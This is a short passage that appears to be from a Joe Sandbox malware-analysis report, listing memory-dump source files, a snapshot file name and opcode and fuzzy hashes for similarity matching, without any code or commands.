                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1f74ba1a2f3533410af298751cd45e2c498d3c2a83613d9a32bfae5dd1a22352
                                                                  • Instruction ID: 8a07049870ab2d26181a678eebda2c67a3797cdc9b36405667d4227476e3a7c2
                                                                  • Opcode Fuzzy Hash: 1f74ba1a2f3533410af298751cd45e2c498d3c2a83613d9a32bfae5dd1a22352
                                                                  • Instruction Fuzzy Hash: 0C41D1B0B003149FCB04ABB9D85576EBBEBEFC9301F104429E10AA7395DF3899468B91
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: